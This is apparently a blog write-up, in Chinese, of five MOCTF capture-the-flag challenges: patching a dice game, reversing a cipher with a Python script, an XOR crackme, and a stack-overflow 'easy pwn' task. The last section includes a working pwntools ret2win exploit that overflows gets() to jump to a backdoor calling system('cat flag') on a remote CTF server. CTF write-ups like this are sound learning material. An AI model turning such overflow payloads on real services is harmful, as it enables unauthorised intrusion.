MOCTF-1

SO EASY

虽然程序很大,但是在main函数里直接可以看见flag。

跳跳跳

还是🎲游戏,千篇一律,nop掉判断就好了,最后给出的字符串base64解密得到flag。

暗恋的苦恼

给了加密程序,密文,密钥,要推算出明文。

ida打开,定位到加密函数:

1
2
3
4
5
6
7
8
9
10
11
12
v7 = strlen(a1);
v6 = strlen(a2);
v4 = 0;
v3 = operator new(0xFFu);
for ( i = 0; i < v7; ++i )
{
if ( v4 == v6 )
v4 = 0;
v3[i] = sub_401005(a1[i], a2[v4++]);
}
v3[i] = 0;
return v3;

每一位密钥对每一位明文操作,当密钥用完时从头再取。
sub_401005:

1
2
3
4
5
6
7
8
9
10
11
v4 = toupper(a1);
v5 = toupper(a2);
if ( v4 == ' ' )
return v4;
for ( i = 0; i < v4 - 65; ++i )
++v5;
if ( v5 > 90 )
result = v5 - 25;
else
result = v5;
return result;

toupper是转换为大写。v5+=v4-65,然后根据v5的值决定返回值。
然而不知道

1
2
3
4
if ( v5 > 90 )
result = v5 - 25;
else
result = v5;

这一部分怎么逆好,就把两种情况都写了…结合题目中有具体意义的提示应该也不失为一种方法吧23333:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
mingwen=""
miwen="QWDRILDWNTW"
miyao="ILOVEMOCTF"
for i in range(len(miwen)):
v5=ord(miwen[i])
v4=65+v5-ord(miyao[i%9])
mingwen+=chr(v4)
print mingwen
mingwen=""
for i in range(len(miwen)):
v5=ord(miwen[i])+25
v4=65+v5-ord(miyao[i%9])
mingwen+=chr(v4)
print mingwen

crakeme2

简单的异或,逆运算得到一串十六进制数字,ascii得到flag。

you get flag , but it … -1s?XD

easy pwn

栈溢出:

1
2
3
4
char s; // [esp+4h] [ebp-14h]

gets(&s);
return puts(&s);

后门函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
.text:0804850B                 public success
.text:0804850B success proc near
.text:0804850B ; __unwind {
.text:0804850B push ebp
.text:0804850C mov ebp, esp
.text:0804850E sub esp, 8
.text:08048511 sub esp, 0Ch
.text:08048514 push offset s ; "you success gets flag"
.text:08048519 call _puts
.text:0804851E add esp, 10h
.text:08048521 sub esp, 0Ch
.text:08048524 push offset command ; "cat flag"
.text:08048529 call _system
.text:0804852E add esp, 10h
.text:08048531 nop
.text:08048532 leave
.text:08048533 retn
.text:08048533 ; } // starts at 804850B

脚本:

1
2
3
4
5
6
7
from pwn import *
sh=remote("139.199.177.55",10001)
sh.recvuntil("easy?\n")
system=0x0804850b
payload='a'*0x18+p32(0x0804850b)
sh.sendline(payload)
sh.interactive()
文章目录
  1. 1. SO EASY
  2. 2. 跳跳跳
  3. 3. 暗恋的苦恼
  4. 4. crakeme2
  5. 5. easy pwn
|